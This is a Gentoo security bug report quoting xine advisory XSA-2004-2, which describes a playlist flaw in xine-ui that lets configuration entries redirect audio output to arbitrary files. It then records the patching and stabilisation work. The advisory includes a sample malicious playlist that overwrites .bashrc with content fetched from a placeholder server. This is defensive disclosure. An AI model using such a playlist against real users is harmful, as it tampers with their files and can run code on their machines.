Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!

Bug 48108

Summary: media-video/xine-ui : filesystem write vulnerability XSA-2004-2
Product: Gentoo Security Reporter: fbusse
Component: GLSA ErrorsAssignee: Gentoo Security <security>
Severity: major CC: media-video, ppc
Priority: High    
Version: unspecified   
Hardware: All   
OS: All   
Package list:
Runtime testing required: ---
Bug Depends on:    
Bug Blocks: 45448, 48324    
Attachments: xine-ui patch

Description fbusse 2004-04-16 22:33:18 UTC
xine security announcement

Announcement-ID: XSA-2004-2

By opening a malicious playlist in the xine-ui media player, an attacker can 
write arbitrary content to an arbitrary file, only restricted by the 
permissions of the user running xine-ui.

xine-ui offers the feature of embedding special items in playlists that will 
apply changes to xine configuration options once the playlist item is played. 
But some of xine's configuration options specify files that will be written 
to during playback. One example of such an option is 
"audio.sun_audio_device", which specifies the audio device on SUN machines. 
The decoded PCM samples of the audio stream will be written to this file. By 
having a user open a playlist with an entry 
"cfg:/audio.sun_audio_device:.bashrc" followed by an entry 
"http://myserver/mybashrc" in xine-ui, the value of the 
"audio.sun_audio_device" option will be changed and the next entry will play 
a specially crafted audio stream. This way an attacker could fill any file 
the user has access to with arbitrary content. Other configuration options 
that allow such an attack exist (we also found "dxr3.devicename"), so the 
vulnerability is not limited to SUN machines.

Expoits have not been seen in the public and not all xine setups use the 
vulnerable configuration options. But at least xine users on SUN machines and 
users of a DXR3 or Hollywood+ MPEG decoder card are vulnerable. Other such 
problematic configuration options might have slipped through the review or 
might be provided by xine plugins outside the main xine distribution, leaving 
other users vulnerable as well. Given the wide range of possible harm, we 
consider this problem to be highly critical.

Affected versions:
All releases starting with 0.9.21 up to and including 0.9.23.

Unaffected versions:
All releases older than 0.9.21.
CVS HEAD has been fixed.
The upcoming 0.99.1 release.

Changes to xine configuration options via playlist are now disabled by 
The attached patch to xine-ui fixes the problem but should only be used by 
distributors who do not want to upgrade. Otherwise, we strongly advise 
everyone to upgrade to CVS HEAD or to the next version of xine-ui, which is 
to be released soon.

For further information and in case of questions, please contact the xine 
team. Our website is

Michael Roitzsch
Comment 1 fbusse 2004-04-16 22:33:40 UTC
Created attachment 29471 [details, diff]
xine-ui patch
Comment 2 Thierry Carrez (RETIRED) gentoo-dev 2004-04-17 07:58:30 UTC
The simpler approach will be to create a 0.9.23-r2 with the patch and have everyone upgrade to it when it's stable (GLSA common with the others xine vulns)

media-video :
sorry to ask you more work after the previous xine-ui, but your help is still needed !

Thanks in advance.
Comment 3 Patrick Kursawe (RETIRED) gentoo-dev 2004-04-19 01:44:45 UTC
Included the patch in xine-ui-0.9.23-r2.
Comment 4 Thierry Carrez (RETIRED) gentoo-dev 2004-04-19 02:00:59 UTC
Thanks phosphan.

Arches : please test xine-ui-0.9.23-r2 and mark stable if/when appropriate.

Comment 5 Thierry Carrez (RETIRED) gentoo-dev 2004-04-21 11:42:37 UTC
Bump: x86, ppc please test and mark stable (if stable :) )
Comment 6 Travis Tilley (RETIRED) gentoo-dev 2004-04-22 02:54:56 UTC
already marked stable on amd64 by someone who forgot to remove amd64 from CC. wee
Comment 7 Thierry Carrez (RETIRED) gentoo-dev 2004-04-26 01:12:28 UTC
x86, ppc : anything I should be aware of preventing this one to go stable ?
We need xine-ui-0.9.23-r2 and xine-lib-1_rc3-r3 stable for GLSA publication -- TIA
Comment 8 David Holm (RETIRED) gentoo-dev 2004-04-26 01:39:45 UTC
Stable on ppc.
Comment 9 Brandon Hale (RETIRED) gentoo-dev 2004-04-26 08:43:33 UTC
Stable on x86.
Comment 10 Thierry Carrez (RETIRED) gentoo-dev 2004-04-26 09:43:44 UTC
GLSA-ready. Common with other xine vulns
Comment 11 Joshua J. Berry (CondorDes) (RETIRED) gentoo-dev 2004-04-26 22:49:45 UTC
GLSA 200404-20.